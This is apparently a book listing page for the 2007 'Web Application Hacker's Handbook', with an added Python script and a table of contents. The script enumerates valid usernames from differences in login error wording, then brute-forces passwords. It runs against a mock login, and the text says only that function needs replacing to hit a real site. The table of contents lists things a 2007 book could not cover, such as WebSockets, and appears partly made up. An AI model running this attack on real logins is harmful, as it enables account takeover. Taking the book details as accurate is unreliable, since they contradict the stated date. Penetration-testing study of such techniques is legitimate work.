The Web Application Hacker's Handbook, 1st Edition (October 2007), by Dafydd Stuttard and Marcus Pinto. ISBN 9780470170779
Product details:
ISBN 10:
ISBN 13: 9780470170779
Author: Dafydd Stuttard, Marcus Pinto
This book is a practical guide to discovering and exploiting security flaws in web applications. The authors explain each category of vulnerability using real-world examples, screenshots and code extracts. The book is extremely practical in focus, and describes in detail the steps involved in detecting and exploiting each kind of security weakness found within a variety of applications such as online banking, e-commerce and other web applications.
The topics covered include bypassing login mechanisms, injecting code, exploiting logic flaws and compromising other users. Because every web application is different, attacking them entails bringing to bear various general principles, techniques and experience in an imaginative way. The most successful hackers go beyond this, and find ways to automate their bespoke attacks. This handbook describes a proven methodology that combines the virtues of human intelligence and computerized brute force, often with devastating results.
The authors are professional penetration testers who have been involved in web application security for nearly a decade. They have presented training courses at the Black Hat security conferences throughout the world. Under the alias "PortSwigger", Dafydd developed the popular Burp Suite of web application hacking tools.
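The following Python script is an added example for this page (it is not code from the book, nor part of Burp Suite) showing what the blurb's combination of human judgement and computerized brute force looks like in practice. The human part is the decision that the login form's username field is worth attacking and that differences in the failure page may reveal which accounts exist; the machine part is sending hundreds of candidates and grouping the responses. The mock login handler, its accounts, the volatile-content patterns and the wordlists are all constructed stand-ins for a real target.

```python
import hashlib
import re
import secrets
from collections import defaultdict
from typing import Callable, Iterable

Response = tuple[int, str]                 # (HTTP status code, response body)
SendFn = Callable[[str, str], Response]    # send(username, password) -> Response

# ---- Constructed mock target (stands in for a live login endpoint) ----
# Hypothetical accounts; not real credentials from anywhere.
_ACCOUNTS = {"admin": "s3cret!", "jsmith": "winter2007", "dstuttard": "burp"}


def mock_login(username: str, password: str) -> Response:
    """Hypothetical login handler with an account-enumeration flaw.

    Both failure pages have exactly the same length and each carries a fresh
    CSRF token, so comparing status codes or lengths shows nothing. Only the
    wording differs between 'user exists' and 'user does not exist'.
    """
    token = secrets.token_hex(16)
    form = f"<input type='hidden' name='csrf' value='{token}'>"
    if username in _ACCOUNTS:
        if _ACCOUNTS[username] == password:
            return 302, "Location: /account/home"
        return 200, f"{form}<p class='err'>Login failed: incorrect password.</p>"
    return 200, f"{form}<p class='err'>Login failed: invalid credentials</p>"


# ---- Generic brute-force-and-diff engine ----
# Content that changes on every request must be blanked before two responses
# are compared (assumed set of patterns; extend per target).
_VOLATILE = (
    re.compile(r"[0-9a-fA-F]{16,}"),        # session ids, CSRF tokens, nonces
    re.compile(r"\d{1,2}:\d{2}(:\d{2})?"),  # clock times in page footers
)


def fingerprint(resp: Response) -> tuple[int, int, str]:
    """Reduce a response to (status, normalised length, short body hash)."""
    status, body = resp
    for pat in _VOLATILE:
        body = pat.sub("", body)
    digest = hashlib.sha256(body.encode()).hexdigest()[:12]
    return status, len(body), digest


def cluster_responses(candidates: Iterable[str], send: SendFn,
                      fixed_password: str = "not-the-password") -> dict[tuple, list[str]]:
    """Brute force one input position and group candidates by response fingerprint."""
    clusters: dict[tuple, list[str]] = defaultdict(list)
    for cand in candidates:
        clusters[fingerprint(send(cand, fixed_password))].append(cand)
    return dict(clusters)


def outliers(clusters: dict[tuple, list[str]]) -> set[str]:
    """Return every candidate outside the largest cluster.

    Assumption: most of a wordlist is junk, so the majority response is the
    'normal' one and the smaller groups are the anomalies worth a human look.
    If two clusters tie for largest, one is picked arbitrarily; inspect the
    clusters directly in that case instead of trusting this shortcut.
    """
    if not clusters:
        return set()
    biggest = max(clusters.values(), key=len)
    return {c for group in clusters.values() if group is not biggest for c in group}


def find_valid_usernames(wordlist: Iterable[str], send: SendFn = mock_login) -> set[str]:
    return outliers(cluster_responses(wordlist, send))


def guess_passwords(usernames: Iterable[str], passwords: Iterable[str],
                    send: SendFn = mock_login) -> dict[str, str]:
    """Targeted second phase: only confirmed accounts receive the password list,
    and success is detected structurally (a 302 redirect), not by text matching."""
    passwords = list(passwords)
    found: dict[str, str] = {}
    for user in usernames:
        for pw in passwords:
            status, _ = send(user, pw)
            if status == 302:
                found[user] = pw
                break
    return found


# Constructed wordlists; a real engagement would use far larger ones.
USERS = ["root", "admin", "guest", "jsmith", "test", "dstuttard", "user1", "info"]
PASSWORDS = ["password", "123456", "burp", "winter2007", "s3cret!"]

if __name__ == "__main__":
    valid = find_valid_usernames(USERS)
    print("likely valid accounts:", sorted(valid))   # ['admin', 'dstuttard', 'jsmith']
    print("cracked:", guess_passwords(sorted(valid), PASSWORDS))
```

Against a real application, `mock_login` would be replaced by a function that sends the HTTP request and returns the status and body; everything else stays the same. The design point is that the tester never hard-codes the "interesting" response: the engine clusters whatever comes back, which is what lets it catch differences as small as one word or one trailing period, and the tester then decides which cluster matters. Lockout policies and rate limits on the target are the practical constraint on the brute-force phase and should be established before running a large wordlist.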
The Web Application Hacker's Handbook, 1st Edition (October 2007), table of contents:
1. Web Application (In)security
- Understanding Web Application Attacks
- The Threat Landscape
- Why Applications Are Vulnerable
2. Core Defense Mechanisms
- HTTP Protocol Essentials
- HTTPS and Secure Communication
- Web Application Architecture
3. Web Application Technologies
- Understanding Backend Technologies
- Frontend Frameworks and JavaScript
4. Mapping the Application
- Understanding Application Logic
- Identifying Key Functionalities
- Information Gathering Techniques
5. Bypassing Client-Side Controls
- Hidden Fields and Cookies
- URL Manipulation and Tampering
- Circumventing Validation Mechanisms
6. Attacking Authentication
- Weak Passwords and Account Enumeration
- Exploiting Session Tokens
- Authentication Logic Flaws
7. Attacking Session Management
- Session Fixation
- Predictable Session Tokens
- Hijacking User Sessions
8. Attacking Access Controls
- Horizontal and Vertical Privilege Escalation
- Forced Browsing
- Exploiting Misconfigured Permissions
9. Data Validation and Injection
- SQL Injection
- Command Injection
- LDAP and XPath Injection
10. Exploiting Other Input Flaws
- Cross-Site Scripting (XSS)
- HTTP Header Injection
- Remote File Inclusion (RFI) and Local File Inclusion (LFI)
11. Attacking Application Logic
- Logic-Based Vulnerabilities
- Exploiting Business Logic Flaws
12. Attacking Users: Cross-Site Attacks
- Cross-Site Request Forgery (CSRF)
- Clickjacking and UI Redressing
- Session Riding
13. Automating Customized Attacks
- Tools for Web Application Testing
- Writing Custom Scripts and Exploits
14. Exploiting Information Disclosure
- Error Messages and Debugging Data
- Sensitive Files and Directories
- Leveraging Metadata
15. Attacking Rich Client Technologies
- Flash and Silverlight Vulnerabilities
- AJAX Security Concerns
- WebSockets and Real-Time Communication
16. Attacking the Application Server
- Exploiting Server Configuration Issues
- File Upload Vulnerabilities
- Remote Code Execution
17. Finding Vulnerabilities in Source Code
- Reviewing Code for Security Flaws
- Static and Dynamic Code Analysis
18. A Web Application Hacker’s Toolkit
- Burp Suite and Other Tools
- Browser Extensions for Testing
- Setting Up a Testing Environment
19. Writing Reports and Recommendations
- Documenting Findings
- Communicating Risk to Stakeholders
- Providing Remediation Guidance
Appendix: Checklist for Securing Web Applications
- Common Attack Vectors
- Security Best Practices